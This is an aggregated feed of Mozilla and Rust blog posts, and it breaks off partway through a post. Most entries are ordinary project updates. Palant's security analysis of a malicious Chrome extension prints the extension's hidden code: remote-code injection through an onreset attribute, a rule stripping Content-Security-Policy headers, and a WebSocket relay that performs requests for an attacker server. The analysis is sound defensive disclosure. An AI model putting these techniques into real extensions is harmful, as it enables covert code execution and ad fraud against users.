Jobs

Please see the latest Who's Hiring thread on r/rust

Quote of the Week

If your rust code compiles and you don't use "unsafe", that is a pretty good certification.

Richard Gould about Rust certifications on rust-users

Thanks to ZiCog for the suggestion!

Please submit quotes and vote for next week!

This Week in Rust is edited by: nellshamrell, llogiq, cdmistman, ericseppanen, extrawurst, U007D, joelmarcey, mariannegoldin, bennyvasquez, bdillo

Email list hosting is sponsored by The Rust Foundation

Discuss on r/rust

The Rust Programming Language Blogcrates.io: development update

Back in July 2024, we published a blog post about the ongoing development of crates.io. Since then, we have made a lot of progress and shipped a few new features. In this blog post, we want to give you an update on the latest changes that we have made to crates.io.

Crate deletions

In RFC #3660 we proposed a new feature that allows crate owners to delete their crates from crates.io under certain conditions. This can be useful if you have published a crate by mistake or if you want to remove a crate that is no longer maintained. After the RFC was accepted by all team members at the end of August, we began implementing the feature.

We created a new API endpoint DELETE /api/v1/crates/:name that allows crate owners to delete their crates and then created the corresponding user interface. If you are the owner of a crate, you can now go to the crate page, open the "Settings" tab, and find the "Delete this crate" button at the bottom. Clicking this button will lead you to a confirmation page telling you about the potential impact of the deletion and requirements that need to be met in order to delete the crate:

Delete Page Screenshot

As you can see from the screenshot above, a crate can only be deleted if either: the crate has been published for less than 72 hours or the crate only has a single owner, and the crate has been downloaded less than 500 times for each month it has been published, and the crate is not depended upon by any other crate on crates.io.

These requirements were put in place to prevent abuse of the deletion feature and to ensure that crates that are widely used by the community are not deleted accidentally. If you have any feedback on this feature, please let us know!

OpenAPI description

Around the holiday season we started experimenting with generating an OpenAPI description for the crates.io API. This was a long-standing request from the community, and we are happy to announce that we now have an experimental OpenAPI description available at https://crates.io/api/openapi.json!

Please note that this is still considered work-in-progress and e.g. the stability guarantees for the endpoints are not written down and the response schemas are also not fully documented yet.

You can view the OpenAPI description in e.g. a Swagger UI at https://petstore.swagger.io/ by putting https://crates.io/api/openapi.json in the top input field. We decided to not ship a viewer ourselves for now due to security concerns with running it on the same domain as crates.io itself. We may reconsider whether to offer it on a dedicated subdomain in the future if there is enough interest.

Swagger UI Screenshot

The OpenAPI description is generated by the utoipa crate, which is a tool that can be integrated with the axum web framework to automatically generate OpenAPI descriptions for all of your endpoints. We would like to thank Juha Kukkonen for his great work on this tool!

Support form and "Report Crate" button

Since the crates.io team is small and mostly consists of volunteers, we do not have the capacity to manually monitor all publishes. Instead, we rely on you, the Rust community, to help us catch malicious crates and users. To make it easier for you to report suspicious crates, we added a "Report Crate" button to all the crate pages. If you come across a crate that you think is malicious or violates the code of conduct or our usage policy, you can now click the "Report Crate" button and fill out the form that appears. This will send an email to the crates.io team, who will then review the crate and take appropriate action if necessary. Thank you to crates.io team member @eth3lbert who worked on the majority of this.

If you have any issues with the support form or the "Report Crate" button, please let us know. You can also always email us directly at help@crates.io if you prefer not to use the form.

Publish notifications

We have added a new feature that allows you to receive email notifications when a new version of your crate is published. This can be useful in detecting unauthorized publishes of your crate or simply to keep track of publishes from other members of your team.

Publish Notification Screenshot

This feature was another long-standing feature request from our community, and we were happy to finally implement it. If you'd prefer not to receive publish notifications, then you can go to your account settings on crates.io and disable these notifications.

Miscellaneous

These were some of the more visible changes to crates.io over the past couple of months, but a lot has happened "under the hood" as well.

  • RFC #3691 was opened and accepted to implement "Trusted Publishing" support on crates.io, similar to other ecosystems that adopted it. This will allow you to specify on crates.io which repository/system is allowed to publish new releases of your crate, allowing you to publish crates from CI systems without having to deal with API tokens anymore.

  • Slightly related to the above: API tokens created on crates.io now expire after 90 days by default. It is still possible to disable the expiry or choose other expiry durations though.

  • The crates.io team was one of the first projects to use the diesel database access library, but since that only supported synchronous execution it was sometimes a little awkward to use in our codebase, which was increasingly moving into an async direction after our migration to axum a while ago. The maintainer of diesel, Georg Semmler, did a lot of work to make it possible to use diesel in an async way, resulting in the diesel-async library. Over the past couple of months we incrementally ported crates.io over to diesel-async queries, which now allows us to take advantage of the internal query pipelining in diesel-async that resulted in some of our API endpoints getting a 10-15% performance boost. Thank you, Georg, for your work on these crates!

  • Whenever you publish a new version or yank/unyank existing versions a couple of things need to be updated. Our internal database is immediately updated, and then we synchronize the sparse and git index in background worker jobs. Previously, yanking and unyanking a high number of versions would each queue up another synchronization background job. We have now implemented automatic deduplication of redundant background jobs, making our background worker a bit more efficient.

  • The final big, internal change that was just merged last week is related to the testing of our frontend code. In the past we used a tool called Mirage to implement a mock version of our API, which allowed us to run our frontend test suite without having to spin up a full backend server. Unfortunately, the maintenance situation around Mirage had lately forced us to look into alternatives, and we are happy to report that we have now fully migrated to the "Industry standard API mocking" package msw. If you want to know more, you can find the details in the "small" migration pull request.

Feedback

We hope you enjoyed this update on the development of crates.io. If you have any feedback or questions, please let us know on Zulip or GitHub. We are always happy to hear from you and are looking forward to your feedback!

Firefox Developer ExperienceFirefox WebDriver Newsletter 135

WebDriver is a remote control interface that enables introspection and control of user agents. As such it can help developers to verify that their websites are working and performing well with all major browsers. The protocol is standardized by the W3C and consists of two separate specifications: WebDriver classic (HTTP) and the new WebDriver BiDi (Bi-Directional).

This newsletter gives an overview of the work we’ve done as part of the Firefox 135 release cycle.

Contributions

Firefox is an open source project, and we are always happy to receive external code contributions to our WebDriver implementation. We want to give special thanks to everyone who filed issues, bugs and submitted patches.

In Firefox 135, several contributors managed to land fixes and improvements in our codebase:

WebDriver code is written in JavaScript, Python, and Rust so any web developer can contribute! Read how to setup the work environment and check the list of mentored issues for Marionette, or the list of mentored JavaScript bugs for WebDriver BiDi. Join our chatroom if you need any help to get started!

General

Improved user interactions simulation

To make user events more realistic and better simulate real user interactions in the browser, we have moved the action sequence processing of the Perform Actions commands in both Marionette and WebDriver BiDi from the content process to the parent process. While events are still sent synchronously from the content process, they are now triggered asynchronously via IPC calls originating from the parent process.

Due to this significant change, you might experience some regressions. If you encounter any issues, please file a bug for the Remote Agent. If the regressions block test execution, you can temporarily revert to the previous behavior by setting the Firefox preference remote.events.async.enabled to false.

With the processing of actions now handled in the parent process the following issues were fixed as well:

WebDriver BiDi

New: format argument for browsingContext.captureScreenshot

Thanks to Liam’s work, the browsingContext.captureScreenshot command now supports the format argument. It allows clients to specify different file formats ("image/png" and "image/jpeg" are currently supported) and define the compression quality for screenshots.

The argument should follow the browsingContext.ImageFormat type, with a "type" property which is expected to be a string, and an optional "quality" property which can be a float between 0 and 1.

-> {
  "method": "browsingContext.captureScreenshot",
  "params": {
    "context": "6b1cd006-96f0-4f24-9c40-a96a0cf71e22",
    "origin": "document",
    "format": {
      "type": "image/jpeg",
      "quality": 0.1
    }
  },
  "id": 3
}

<- {
  "type": "success",
  "id": 3,
  "result": {
    "data": "iVBORw0KGgoAAAANSUhEUgAA[...]8AbxR064eNvgIAAAAASUVORK5CYII="
  }
}

Bug Fixes

Mozilla Privacy BlogNavigating the Future of Openness and AI Governance: Insights from the Paris Openness Workshop

In December 2024, in the lead up to the AI Action Summit, Mozilla, Fondation Abeona, École Normale Supérieure (ENS) and the Columbia Institute of Global Politics gathered at ENS in Paris, bringing together a diverse group of AI experts, academics, civil society, regulators and business leaders to discuss a topic increasingly central to the future of AI: what does openness mean and how it can enable trustworthy, innovative, and equitable outcomes?

The workshop followed the Columbia Convenings on Openness and AI, that Mozilla held in partnership with Columbia University’s Institute of Global Politics. These gatherings, held over the course of 2024 in New York and San Francisco, have brought together over 40 experts to address what “openness” should mean in the AI era.

Over the past two years, Mozilla has mounted a significant effort to promote and defend the role of openness in AI. Mozilla launched Mozilla.ai, an initiative focused on ethical, open-source AI tools, and supported small-scale, localized AI projects through its Builders accelerator program. Beyond technical investments, Mozilla has also been a vocal advocate for openness in AI policy, urging governments to adopt regulatory frameworks that foster competition and accountability while addressing risks. Through these initiatives, Mozilla is shaping a future where AI development aligns with public interest values.

This Paris Openness workshop discussion — part of the official ‘Road to the Paris AI Summit’ taking place in February 2025 — looked to bring together the European AI community and form actionable recommendations for policymakers. While it embraced healthy debate and disagreement around issues such as definitions of openness in AI, there was nevertheless broad agreement on the urgency of crafting collective ideas to advance openness while navigating an increasingly complex commercial, political and regulatory landscape.

The stakes could not be higher. As AI continues to shape our societies, economies, and governance systems, openness emerges as both an opportunity and a challenge. On one hand, open approaches can expand access to AI tools, foster innovation, and enhance transparency and accountability. On the other hand, they raise complex questions about safety and misuse. In Europe, these questions intersect with transformative regulatory frameworks like the EU AI Act, which seeks to ensure that AI systems are both safe and aligned with fundamental rights.

As in software development, the goal of being ‘open’ in AI is a crucial one. At its heart, openness, we were reminded in the discussion, is a holistic outlook. For AI in particular it is a pathway to getting to a more pluralistic tool – one that can be more transparent, contextual, participatory and culturally appropriate. Each of these goals however contain natural tensions within them.

A central question of this most recent dialogue challenged participants on the best ways to build with safety in mind while also embracing openness. The day was broken down into two workshops that examined these questions from a technical and policy standpoint.

Running through both of the workshops was the thread of a persistent challenge: the multifaceted nature of the term openness. In the policy context, the term “open-source” can be too narrow, and at times, it risks being seen as an ideological stance rather than a pragmatic tool for addressing specific issues. To address this, many participants felt openness should be framed as a set of components — including open models, data, and tools — each of which has specific benefits and risks.

Examining Technical Perspectives on Openness and Safety

A significant concern for many in the open-source community is getting access to the best existing safety tools. Despite the increasing importance of AI safety, many researchers can find it difficult or expensive to access tools to help identify and address AI risks. In particular the discussion surfaced an increasing tension between some researchers and startups who have found it difficult to access datasets of known CSAM (Child Sexual Abuse Material) hashtags. Accessing these data sets could help mitigate misuse or clean training datasets. The workshop called for broader sharing of safety tools and more support for those working at the cutting edge of AI development.

More widely, some participants were frustrated by perceptions that open source AI development is not bothered by questions of safety. They pointed out that, especially when it comes to regulation, focusing on questions of safety makes them even more competitive.

Discussing Policy Implications of Openness in AI

Policy discussions during the workshop focused on the economic, societal, and regulatory dimensions of openness in AI. These ranged over several themes, including:

  1. Challenging perceptions of openness: There is a clear need to change the narrative around openness, especially in policymaking circles. The open-source community must both act as a community and present itself as knowledgeable and solution-oriented, demonstrating how openness can be a means to advancing the public interest — not an abstract ideal. As one participant pointed out, openness should be viewed as a tool for societal benefit, not as an end in itself.
  2. Tensions between regulation and innovation are misleading: As one of the first regulatory frameworks on AI to be drafted, many people view the EU’s AI Act as a test bed to get to smarter AI regulation. While there is a widespread characterisation of regulation obstructing innovation, some participants highlighted that this can be misleading — many new entrants seek out jurisdictions with favourable regulatory and competition policies that level the playing field.
  3. A changing U.S. Perspective: In the United States, the open-source AI agenda has gained significant traction, particularly in the wake of incidents like the Llama leaks, which showed that many of the feared risks associated with openness did not materialize. Significantly, the U.S. National Telecommunications and Information Administration emphasized the benefits of open source AI technology and introduced a nuanced view of safety concerns around open-weight AI models.

Many participants also agreed that policymakers, many of whom are not deeply immersed in the technicalities of AI, need a clearer framework for understanding the value of openness. Considering the focus of the upcoming Paris AI Summit, some participants felt one solution could lie in focusing on public interest AI. This concept resonates more directly with broader societal goals while still acknowledging the risks and challenges that openness brings.

Recommendations 

Embracing openness in AI is non-negotiable if we are to build trust and safety; it fosters transparency, accountability, and inclusive collaboration. Openness must extend beyond software to broader access to the full AI stack, including data and infrastructure, with a governance that safeguards public interest and prevents monopolization.

It is clear that the open source community must make its voice louder. If AI is to advance competition, innovation, language, research, culture and creativity for the global majority of people, then an evidence-based approach to the benefits of openness, particularly when it comes to proven economic benefits, is essential for driving this agenda forward.

Several recommendations for policymakers also emerged.

  1. Diversify AI Development: Policymakers should seek to diversify the AI ecosystem, ensuring that it is not dominated by a few large corporations in order to foster more equitable access to AI technologies and reduce monopolistic control. This should be approached holistically, looking at everything from procurement to compute strategies.
  2. Support Infrastructure and Data Accessibility: There is an urgent need to invest in AI infrastructure, including access to data and compute power, in a way that does not exacerbate existing inequalities. Policymakers should prioritize distribution of resources to ensure that smaller actors, especially those outside major tech hubs, are not locked out of AI development.
  3. Understand openness as central to achieving AI that serves the public interest. One of the official tracks of the upcoming Paris AI Action Summit is Public Interest AI. Increasingly, openness should be deployed as a main route to truly publicly interested AI.
  4. Openness should be an explicit EU policy goal: As one of the furthest along in AI regulatory frameworks the EU will continue to be a testbed for many of the big questions in AI policy. The EU should adopt an explicit focus on promoting openness in AI as a policy goal.

We will be raising all the issues discussed while at the AI Action Summit in Paris. The organizers hope to host another set of these discussions following the conclusion of the Summit in order to continue working with the community and to better inform governments and other stakeholders around the world.

The list of participants at the Paris Openness Workshop is below:

  • Linda Griffin – VP of Global Policy, Mozilla
  • Udbhav Tiwari – Director, Global Product Policy, Mozilla
  • Camille François – Researcher, Columbia University
  • Tanya Perelmuter – Co-founder and Director of Strategy,, Fondation Abeona
  • Yann Lechelle – CEO, Probabl
  • Yann Guthmann – Head of Digital Economy, Department at the French Competition Authority
  • Adrien Basdevant – Tech lawyer, Entropy Law
  • Andrzej Neugebauer – AI Program Director, LINAGORA
  • Thierry Poibeau – Director of Research, CNRS, ENS
  • Nik Marda – Technical Lead for AI Governance, Mozilla
  • Andrew Strait – Associate Director, Ada Lovelace Institute (UK)
  • Paul Keller – Director of Policy, Open Future (Netherlands)
  • Guillermo Hernandez – AI Policy Analyst, OECD
  • Sandrine Elmi Hersi – Unit Chief of “Open Internet”, ARCEP

The post Navigating the Future of Openness and AI Governance: Insights from the Paris Openness Workshop appeared first on Open Policy & Advocacy.

Wladimir PalantAnalysis of an advanced malicious Chrome extension

Two weeks ago I published an article on 63 malicious Chrome extensions. In most cases I could only identify the extensions as malicious. With large parts of their logic being downloaded from some web servers, it wasn’t possible to analyze their functionality in detail.

However, for the Download Manager Integration Checklist extension I have all parts of the puzzle now. This article is a technical discussion of its functionality that somebody tried very hard to hide. I was also able to identify a number of related extensions that were missing from my previous article.

Update (2025-02-04): An update to Download Manager Integration Checklist extension has been released a day before I published this article, clearly prompted by me asking adindex about this. The update removes the malicious functionality and clears extension storage. Luckily, I’ve saved both the previous version and its storage contents.

Screenshot of an extension pop-up. The text in the popup says “Seamlessly integrate the renowned Internet Download Manager (IDM) with Google Chrome, all without the need for dubious third-party extensions” followed up with some instructions.

The problematic extensions

Since my previous article I found a bunch more extensions with malicious functionality that is almost identical to Download Manager Integration Checklist. The extension Auto Resolution Quality for YouTube™ does not seem to be malicious (yet?) but shares many remarkable oddities with the other extensions.

Name Weekly active users Extension ID Featured
Freemybrowser 10,000 bibmocmlcdhadgblaekimealfcnafgfn
AutoHD for Twitch™ 195 didbenpmfaidkhohcliedfmgbepkakam
Free simple Adult Blocker with password 1,000 fgfoepffhjiinifbddlalpiamnfkdnim
Convert PDF to JPEG/PNG 20,000 fkbmahbmakfabmbbjepgldgodbphahgc
Download Manager Integration Checklist 70,000 ghkcpcihdonjljjddkmjccibagkjohpi
Auto Resolution Quality for YouTube™ 223 hdangknebhddccoocjodjkbgbbedeaam
Adblock.mx - Adblock for Chrome 1,000 hmaeodbfmgikoddffcfoedogkkiifhfe
Auto Quality for YouTube™ 100,000 iaddfgegjgjelgkanamleadckkpnjpjc
Anti phising safer browsing for chrome 7,000 jkokgpghakemlglpcdajghjjgliaamgc
Darktheme for google translate 40,000 nmcamjpjiefpjagnjmkedchjkmedadhc

Additional IOCs:

  • adblock[.]mx
  • adultblocker[.]org
  • autohd[.]org
  • autoresolutionquality[.]com
  • browserguard[.]net
  • freemybrowser[.]com
  • freepdfconversion[.]com
  • internetdownloadmanager[.]top
  • megaxt[.]com
  • darkmode[.]site

“Remote configuration” functionality

The Download Manager Integration Checklist extension was an odd one on the list in my previous article. It has very minimal functionality: it’s merely supposed to display a set of instructions. This is a task that doesn’t require any permissions at all, yet the extension requests access to all websites and declarativeNetRequest permission. Apparently, nobody noticed this inconsistency so far.

Looking at the extension code, there is another oddity. The checklist displayed by the extension is downloaded from Firebase, Google’s online database. Yet there is also a download from https://help.internetdownloadmanager.top/checklist, with the response being handled by this function:

async function u(l) {
  await chrome.storage.local.set({ checklist: l });

  await chrome.declarativeNetRequest.updateDynamicRules({
    addRules: l.list.add,
    removeRuleIds: l.list.rm,
  });
}

This is what I flagged as malicious functionality initially: part of the response is used to add declarativeNetRequest rules dynamically. At first I missed something however: the rest of the data being stored as checklist is also part of the malicious functionality, allowing execution of remote code:

function f() {
  let doc = document.documentElement;
  function updateHelpInfo(info, k) {
    doc.setAttribute(k, info);
    doc.dispatchEvent(new CustomEvent(k.substring(2)));
    doc.removeAttribute(k);
  }

  document.addEventListener(
    "description",
    async ({ detail }) => {
      const response = await chrome.runtime.sendMessage(
        detail.msg,
      );
      document.dispatchEvent(
        new CustomEvent(detail.responseEvent, {
          detail: response,
        }),
      );
    },
  );

  chrome.storage.local.get("checklist").then(
    ({ checklist }) => {
      if (checklist && checklist.info && checklist.core) {
        updateHelpInfo(checklist.info, checklist.core);
      }
    },
  );
}

There is a tabs.onUpdated listener hidden within the legitimate webextension-polyfill module that will run this function for every web page via tabs.executeScript API.

This function looks fairly unsuspicious. Understanding its functionality is easier if you know that checklist.core is "onreset". So it takes the document element, fills its onreset attribute with some JavaScript code from checklist.info, triggers the reset event and removes the attribute again. That’s how this extension runs some server-provided code in the context of every website.

The code being executed

When the extension downloads its “checklist” immediately after installation the server response will be empty. Sort of: “nothing to see here, this is merely some dead code somebody forgot to remove.” The server sets a cookie however, allowing it to recognize the user on subsequent downloads. And only after two weeks or so it will respond with the real thing. For example, the list key of the response looks like this then:

"add": [
  {
    "action": {
      "responseHeaders": [
        {
          "header": "Content-Security-Policy-Report-Only",
          "operation": "remove"
        },
        {
          "header": "Content-Security-Policy",
          "operation": "remove"
        }
      ],
      "type": "modifyHeaders"
    },
    "condition": {
      "resourceTypes": [
        "main_frame"
      ],
      "urlFilter": "*"
    },
    "id": 98765432,
    "priority": 1
  }
],
"rm": [
  98765432
]

No surprise here, this is about removing Content Security Policy protection from all websites, making sure it doesn’t interfere when the extension injects its code into web pages.

As I already mentioned, the core key of the response is "onreset", an essential component towards executing the JavaScript code. And the JavaScript code in the info key is heavily obfuscated by JavaScript Obfuscator, with most strings and property names encrypted to make reverse engineering harder.

Of course this kind of obfuscation can still be reversed, and you can see the entire deobfuscated code here. Note that most function and variable names have been chosen randomly, the original names being meaningless. The code consists of three parts:

  1. Marshalling of various extension APIs: tabs, storage, declarativeNetRequest. This uses DOM events to communicate with the function f() mentioned above, this function forwards the messages to the extension’s background worker and the worker then calls the respective APIs.

    In principle, this allows reading out your entire browser state: how many tabs, what pages are loaded etc. Getting notified on changes is possible as well. The code doesn’t currently use this functionality, but the server can of course produce a different version of it any time, for all users or only for selected targets.

    There is also another aspect here: in order to run remote code, this code has been moved into the website realm. This means however that any website can abuse these APIs as well. It’s only a matter of knowing which DOM events to send. Yes, this is a massive security issue.

  2. Code downloading a 256 KiB binary blob from https://st.internetdownloadmanager.top/bff and storing it in encoded form as bff key in the extension storage. No, this isn’t your best friend forever but a Bloom filter. This filter is applied to SHA-256 hashes of domain names and determines on which domain names the main functionality should be activated.

    With Bloom filters, it is impossible to determine which exact data went into it. It is possible however to try out guesses, to see which one it accepts. Here is the list of matching domains that I could find. This list looked random to me initially, and I even suspected that noise has been added to it in order to hide the real target domains. Later however I could identify it as the list of adindex advertisers, see below.

  3. The main functionality: when active, it sends the full address of the current page to https://st.internetdownloadmanager.top/cwc2 and might get a “session” identifier back. It is likely that this this server stores the addresses it receives and sells the resulting browsing history. This part of the functionality stays hidden however.

    The “session” handling is visible on the other hand. There is some rate limiting here, making sure that this functionality is triggered at most once per minute and no more than once every 12 hours for each domain. If activated, a message is sent back to the extension’s background worker telling it to connect to wss://pa.internetdownloadmanager.top/s/<session>. All further processing happens there.

The “session” handling

Here we are back in the extension’s static code, no longer remotely downloaded code. The entry point for the “session” handling is function __create. Its purpose has been concealed, with some essential property and method names contained in the obfuscated code above or received from the web socket connection. I filled in these parts and simplified the code to make it easier to understand:

var __create = url => {
  const socket = new this.WebSocket(url);
  const buffer = {};
  socket.onmessage = event => {
    let message = event.data.arrayBuffer ? event.data : JSON.parse(event.data);
    this.stepModifiedMatcher(socket, buffer, message)
  };
};

stepModifiedMatcher =
  async (socket, buffer, message) => {
    if (message.arrayBuffer)
      buffer[1] = message.arrayBuffer();
    else {
      let [url, options] = message;
      if (buffer[1]) {
        options.body = await buffer[1];
        buffer[1] = null;
      }

      let response = await this.fetch(url, options);
      let data = await Promise.all([
        !message[3] ? response.arrayBuffer() : false,
        JSON.stringify([...response.headers.entries()]),
        response.status,
        response.url,
        response.redirected,
      ]);
      for (const entry of data) {
        if (socket.readyState === 1) {
          socket.send(entry);
        }
      }
    }
  };

This receives instructions from the web socket connection on what requests to make. Upon success the extension sends information like response text, HTTP headers and HTTP status back to the server.

What is this good for? Before I could observe this code in action I was left guessing. Is this an elaborate approach to de-anonymize users? On some websites their name will be right there in the server response. Or is this about session hijacking? There would be session cookies in the headers and CSRF tokens in the response body, so the extension could be instrumented to perform whatever actions necessary on behalf of the attackers – like initiating a money transfer once the user logs into their PayPay account.

The reality turned out to be far more mundane. When I finally managed to trigger this functionality on the Ashley Madison website, I saw the extension perform lots of web requests. Apparently, it was replaying a browsing session that was recorded two days earlier with the Firefox browser. The entry point of this session: https://api.sslcertifications.org/v1/redirect?advertiserId=11EE385A29E861E389DA14DDA9D518B0&adspaceId=11EE4BCA2BF782C589DA14DDA9D518B0&customId=505 (redirecting to ashleymadison.com).

Developer Tools screenshot, listing a number of network requests. It starts with ashleymadison.com and loads a number of JavaScript and CSS files as well as images. All requests are listed as fetch requests initiated by background.js:361.

The server handling api.sslcertifications.org belongs to the German advertising company adindex. Their list of advertisers is mostly identical to the list of domains matched by the Bloom filter the extension uses. So this is ad fraud: the extension generates fake link clicks, making sure its owner earns money for “advertising” websites like Ashley Madison. It uses the user’s IP address and replays recorded sessions to make this look like legitimate traffic, hoping to avoid detection this way.

I contacted adindex and they confirmed that sslcertifications.org is a domain registered by a specific publisher but handled by adindex. They also said that they confronted the publisher in question with my findings and, having found their response unsatisfactory, blocked this publisher. Shortly afterwards the internetdownloadmanager.top domain became unreachable, and api.sslcertifications.org site no longer has a valid SSL certificate. Domains related to other extensions, the ones I didn’t mention in my request, are still accessible.

Who is behind these extensions?

The adindex CEO declined to provide the identity of the problematic publisher. There are obvious data protection reasons for that. However, as I looked further I realized that he might have additional reasons to withhold this information.

While most extensions I list provide clearly fake names and addresses, the Auto Quality for YouTube™ extension is associated with the MegaXT website. That website doesn’t merely feature a portfolio of two browser extensions (the second one being an older Manifest V2 extension also geared towards running remote code) but also a real owner with a real name. Who just happens to be a developer at adindex.

There is also the company eokoko GmbH, developing Auto Resolution Quality for YouTube™ extension. This extension appears to be non-malicious at the moment, yet it shares a number of traits with the malicious extensions on my list. Director of this company is once again the same adindex developer.

And not just any developer. According to his website he used to be CTO at adindex in 2013 (I couldn’t find an independent confirmation for this). He also founded a company together with the adindex CEO in 2018, something that is confirmed by public records.

When I mentioned this connection in my communication with adindex CEO the response was:

[He] works for us as a freelancer in development. Employees (including freelancers) are generally not allowed to operate publisher accounts at adindex and the account in question does not belong to [this developer]. Whether he operates extensions is actually beyond my knowledge.

I want to conclude this article with some assorted history facts:

  • The two extensions associated with MegaXT have been running remote code since at least 2021. I don’t know whether they were outright malicious from the start, this would be impossible to prove retroactively even with source code given that they simply loaded some JavaScript code into the extension context. But both extensions have reviews complaining about malicious functionality going back to 2022.
  • Darktheme for google translate and Download Manager Integration Checklist extensions both appear to have changed hands in 2024, after which they requested more privileges with an update in October 2024.
  • Download Manager Integration Checklist extension used to be called “IDM Integration Module” in 2022. There have been at least five more extensions with similar names (not counting the official one), all removed from Chrome Web Store due to “policy violation.” This particular extension was associated with a website which is still offering “cracks” that show up as malware on antivirus scans (the installation instructions “solve” this by recommending to turn off antivirus protection). But that’s most likely the previous extension owner.
  • Convert PDF to JPEG/PNG appears to have gone through a hidden ownership change in 2024, after which an update in September 2024 requested vastly extended privileges. However, the extension has reviews complaining about spammy behavior going back to 2019.

Mozilla Performance BlogPerformance Testing Newsletter (Q4 Edition)

Welcome to the latest edition of the Performance Testing Newsletter! The PerfTools team empowers engineers with tools to continuously improve the performance of Mozilla products. See below for highlights from the changes made in the last quarter.

This quarter also saw the release of perf.compare! It’s a new tool used for making comparisons between try runs (or other pushes). It is now the default comparison tool used for these comparisons and replaces the Compare View that was in use previously. Congratulations to all the folks involved in making this release happen! Feel free to reach out in #perfcompare on Matrix if there are any questions, feature requests, etc.. Bugs can be filed in Testing :: PerfCompare.

Highlights from Contributors

PerfCompare

Profiler

Perftest

Highlights from Rest of the Team

Blog Posts ✍️

Contributors

If you have any questions, or are looking to add performance testing for your code component, you can find us in #perftest on Element, or #perf-help on Slack.

The Servo BlogServo in 2024: stats, features and donations

Two years after the renewed activity on the project we can confirm that Servo is fully back.

If we ignore the bots, in 2024 we’ve had 129 unique contributors (+143% over 54 last year), landing 1,771 pull requests (+163% over 673), and that’s just in our main repo!

Including bots, the total number of PRs merged goes up to 2,674 (+144% over 1094). From all this work, 26% of the PRs were made by Igalia, 40% by other contributors and the rest by the bots (34%). This shows how the Servo community has been growing and becoming more diverse with new actors participating actively in the project.

2018 2019 2020 2021 2022 2023 2024
Merged PRs 1,188 986 669 118 65 776 1,771
Unique contributors 142 141 87 37 20 54 129
Average unique contributors per month 27.33 27.17 14.75 4.92 2.83 11.33 26.33

Now let’s take a look to the data and chart above, which show the evolution since 2018 in number of merged PRs, unique contributors per year and average contributors per month (excluding bots). We can see the project is back to numbers of 2018 and 2019 when it was been developed in full speed!

It’s worth noting that Servo popularity keeps growing, with many folks realizing there has been new activity on the project last year, and we have more and more people interested in the project.

Servo GitHub start history chart showing Servo not stopping going up since 2013, up to more than 25,000 today <figcaption>Servo GitHub stars haven't stopped growing, surpassing now 25K threshold.</figcaption>

During 2024 Servo has been present in 8 events with 9 talks: FOSDEM, Open Source Summit North America, Seattle Rust user meetup, GOSIM Europe, Global Software Technology Summit, Linux Foundation Europe Member Summit, GOSIM China, Ubuntu Summit.

If we focus on development there has been many things moving forward during the year. Servo main dependencies (SpiderMonkey, Stylo and WebRender) have been upgraded, the new layout engine has kept evolving adding support for floats, tables, flexbox, fonts, etc. By the end of 2024 Servo passes 1,515,229 WPT subtests (79%). Many other new features have been under active development: WebGPU, Shadow DOM, ReadableStream, WebXR, … Servo now supports two new platforms: Android and OpenHarmony. And we have got the first experiments of applications using Servo as a web engine (like Tauri, Blitz, QtWebView, Cuervo, Verso and Moto).

In 2024 we have raised 33,632.64 USD with donations via Open Collective and GitHub Sponsors from 500 different people and organizations. Thank you all for supporting us!

With this money we have now 3 servers that provides self-hosted runners for Linux, macOS, and Windows reducing our build times from over an hour to under 30 minutes.

Talking about the future, the Servo TSC has been discussing the roadmap for 2025 which has been updated on the Servo’s wiki. We have many plans to keep Servo thriving with new features and improvements. Let’s hope for a great 2025!

Mozilla ThunderbirdVIDEO: The Thunderbird Mobile Team

The Thunderbird Mobile team are crafting the newest chapter of the Thunderbird story. In this month’s office hours, we sat down to chat with the entire mobile team! This includes Philipp Kewisch, Sr. Manager of Mobile Engineering (and long-time Thunderbird contributor), and Sr. Software Engineers cketti and Wolf Montwé (long-time K-9 Mail maintainer and developer, respectively). We talk about the journey from K-9 Mail to Thunderbird for Android, what’s new and what’s coming in the near future, and the first steps towards Thunderbird on your iOS devices!

Next month, we’ll be chatting with Laurel Terlesky, Manager of the UI/UX Design Studio! She’ll be sharing her FOSDEM talk, “Thunderbird: Building a Cross-Platform, Scalable Open-Source Design System.” It’s been a while since we’ve chatted with the design team, and it will be great to see what they’re working on.

January Office Hours: The Thunderbird Mobile Team

In June 2022, we announced that K-9 Mail would be joining the Thunderbird family, and would ultimately become Thunderbird for Android. After two years of development, the first beta release of Thunderbird for Android debuted in October 2024, shortly followed by the first stable release. Since then, over 200 thousand users have downloaded the app, and we’ve gotten some very nice reviews in ZDNet and Android Authority. If you haven’t tried us on your Android device yet, now is a great time! And if, like some of us, you’re waiting for Thunderbird to come to your iPhone or iPad, we have some exciting news at the end of our talk.

Want to know more about the Android development process and find out what’s coming soon to the app? Want the first look into our plans for Thunderbird on iOS? Let our mobile team guests provide the answers!

Watch, Read, and Get Involved

We’re so grateful to Philipp, cketti, and Wolf for joining us! We hope this video helps explain more about Thunderbird on Android (and eventually iOS), and encourages you to download the app if you haven’t already. If you’re a regular user, we hope you consider contributing code, translations, or support. And if you’re an iOS developer, we hope you consider joining our team!

VIDEO (Also on Peertube):

Thunderbird for Android Resources:

The post VIDEO: The Thunderbird Mobile Team appeared first on The Thunderbird Blog.

The Rust Programming Language BlogAnnouncing Rust 1.84.1

Niko MatsakisPreview crates

This post lays out the idea of preview crates.1 Preview crates would be special crates released by the rust-lang org. Like the standard library, preview crates would have access to compiler internals but would still be usable from stable Rust. They would be used in cases where we know we want to give users the ability to do X but we don’t yet know precisely how we want to expose it in the language or stdlib. In git terms, preview crates would let us stabilize the plumbing while retaining the ability to iterate on the final shape of the porcelain.

Nightly is not enough

Developing large language features is a tricky business. Because everything builds on the language, stability is very important, but at the same time, there are some questions that are very hard to answer without experience. Our main tool for getting this experience has been the nightly toolchain, which lets us develop, iterate, and test features before committing to them.

Because the nightly toolchain comes with no guarantees at all, however, most users who experiment with it do so lightly, just using it for toy projects and the like. For some features, this is perfectly fine, particularly syntactic features like let-else, where you can learn everything you need to know about how it feels from a single crate.

Nightly doesn’t let you build a fledgling ecosystem

Where nightly really fails us though is the ability to estimate the impact of a feature on a larger ecosystem. Sometimes you would like to expose a capability and see what people build with it. How do they use it? What patterns emerge? Often, we can predict those patterns in advance, but sometimes there are surprises, and we find that what we thought would be the default mode of operation is actually kind of a niche case.

For these cases, it would be cool if there were a way to issue a feature in “preview” mode, where people can build on it, but it is not yet released in its final form. The challenge is that if we want people to use this to build up an ecosystem, we don’t want to disturb all those crates when we iterate on the feature. We want a way to make changes that lets those crates keep working until the maintainers have time to port to the latest syntax, naming, or whatever.

Editions are closer, but not quite right

